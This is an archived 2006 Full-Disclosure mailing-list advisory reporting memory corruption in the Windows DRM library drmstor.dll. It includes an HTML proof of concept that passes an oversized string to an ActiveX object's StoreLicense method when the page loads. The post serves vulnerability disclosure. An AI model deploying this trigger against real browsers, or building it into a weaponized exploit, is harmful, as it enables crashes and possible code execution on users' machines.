[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20061009110444.68123.qmail@web23003.mail.ird.yahoo.com>
Date: Mon, 9 Oct 2006 13:04:44 +0200 (CEST)
From: Joxean Koret <joxeankoret@...oo.es>
To: full-disclosure@...ts.grok.org.uk
Subject: MS Windows DRM software Memory Corruption
Hi to all,
While finding buffer overflows in Internet Explorer I
found a memory corruption in the "drmstor.dll"
library which is a part of the DRM (Digital Rights
Management) software supplied with MS Windows.
The following Proof Of Concept is sufficient enough to
test the vulnerability:
<html>
<script>
function test()
{
var obj;
var x;
x = "AAAA";
for (i=0;i<=21;++i)
x += x;
obj = document.getElementById('testObj');
obj.StoreLicense(x);
}
</script>
<body onload="test();">
<object id='testObj'
classid="CLSID:{760c4b83-e211-11d2-bf3e-00805fbe84a6}">
</object>
</body>
</html>
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Contact
-------
Joxean Koret at <<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es
______________________________________________
LLama Gratis a cualquier PC del Mundo.
Llamadas a fijos y móviles desde 1 céntimo por minuto.
http://es.voice.yahoo.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists